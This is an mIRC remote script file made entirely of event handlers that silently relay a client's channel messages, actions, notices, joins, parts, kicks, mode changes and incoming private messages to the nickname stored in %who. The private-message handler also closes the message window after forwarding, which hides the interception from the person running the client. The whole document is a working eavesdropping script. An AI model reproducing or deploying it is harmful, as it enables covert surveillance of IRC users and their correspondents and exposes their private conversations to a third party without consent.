[script]
n0=on 1:TEXT:*:#:/msg %who ( $+ $chan $+ ) < $+ $nick $+ > $parms
n1=on 1:ACTION:*:#:/msg %who ( $+ $chan $+ ) * $+ $nick $parms
n2=on 1:NOTICE:*:*:/msg %who ( $+ $chan $+ ) ( $+ $nick $+ ] $parms
n3=on 1:KICK:#:/msg %who ( $+ $chan $+ ) ( $+ $nick $+ ] Kicked out: ( $+ $knick $+ )
n4=on 1:DEOP:#:/msg %who ( $+ $chan $+ ) ( $+ $nick $+ ] Deoped: ( $+ $opnick $+ )
n5=on 1:MODE:#:/msg %who ( $+ $chan $+ ) ( $+ $nick $+ ] Changed Mode: $parms
n6=on 1:TOPIC:#:/msg %who ( $+ $chan $+ ) ( $+ $nick $+ ] Changed the Topic
n7=on 1:JOIN:#:/msg %who ( $+ $chan $+ ) ( $+ $nick $+ ] Has Joined the Channel.
n8=on 1:PART:#:/msg %who ( $+ $chan $+ ) ( $+ $nick $+ ] Has Parted the Channel.
n9=on 1:QUIT:#:/msg %who ( $+ $chan $+ ) ( $+ $nick $+ ) has quit IRC ( $+ $parms $+ )
n10=on 1:TEXT:*:?:/msg %who ( $+ $chan $+ ) ( $+ $nick $+ ) Sent The Following MSG: $parms | /closemsg $nick
